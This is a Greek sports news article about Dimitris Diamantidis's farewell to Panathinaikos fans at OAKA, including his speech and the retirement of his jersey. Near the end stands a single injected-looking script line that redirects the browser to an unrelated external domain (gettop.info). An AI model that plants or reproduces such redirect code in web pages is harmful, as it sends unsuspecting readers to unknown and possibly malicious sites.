Το συγκλονιστικό αντίο του 3D (ΒΙΝΤΕΟ)

0
21

 

Την αποθέωση γνώρισε ο αρχηγός του Παναθηναϊκού από 20.000 κόσμου στον τελευταίο αγώνα της καριέρας του. ο Δημήτρης Διαμαντίδης, πήρε το μικρόφωνο και αποχαιρέτησε με λόγια συγκίνησης που έφραζαν τον λαιμό του.

«Τελικά είναι πιο εύκολο να παίζεις. Σας ευχαριστώ όλους για όλα αυτά τα χρόνια και τη στήριξή σας.Θέλω να ευχαριστήσω την ΚΑΕ Παναθηναϊκός για την τιμή που μου κάνει αυτές τις μέρες, καθώς και προσωπικά την οικογένεια Γιαννακόπουλου. Τον κύριο Παύλο, τον κύριο Θανάση, τον κύριο Δημήτρη και τον κύριο Κώστα.Επίσης, ένα μεγάλο ευχαριστώ σε όλους τους συμπαίκτες που είχα σε αυτή την ομάδα, στους προπονητές μου. Κάποιοι είναι παρόντες, κάποιοι όχι, αλλά τους αγαπώ πολύ. Σε έναν άνθρωπο που μου έδειξε τον δρόμο και θα είναι πάντα στην καρδιά μου, τον Κώστα Πιλαφίδη.Θα μου επιτρέψετε να ευχαριστήσω και κάποιους άλλους ανθρώπους. Τον κύριο Πάρη, τον Παναγιώτη, τον κύριο Νίκο, τον κύριο Σάββατο, τον γιατρό μου τον κύριο Θανάση.Μέσα στην καρδιά μου θα σας έχω, ευχαριστώ για όλα!»

Πριν από την είσοδο του Διαμαντίδη, το παρκέ είχε μετατραπεί σε οθόνη, όπου επάνω του η ΚΑΕ πρόβαλε σε βίντεο τις μεγαλύτερες στιγμές του μεγαλύτερου παίκτη της στη σύγχρονη ιστορία.

Η πράσινη φανέλα με το Νο 13 του Διαμαντίδη πήρε τη θέση στον «ουρανό» του ΟΑΚΑ, δίπλα στα έξι ευρωπαϊκά λάβαρα, ισάριθμα των ευρωπαϊκών τίτλων των «πρασίνων». Δίπλα στο Νο 4, τη φανέλα του προηγούμενου αρχηγού του Παναθηναϊκού, Φραγκίσκου Αλβέρτη.

Ένα λεπτό πριν από το ημίχρονο του αγώνα Παναθηναϊκός-ΤΣΣΚΑ Μόσχας για το τουρνουά «Diamonds for ever», ο Δημήτρης Διαμαντίδης σηκώθηκε από τον πάγκο για να μπει στο παρκέ και μαζί του σηκώθηκε όλο το ΟΑΚΑ!

Η gazetta.gr παρουσιάζει εικόνες από τα άδυτα του ΟΑΚΑ, τις οποίες ελάχιστοι είδαν.

setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here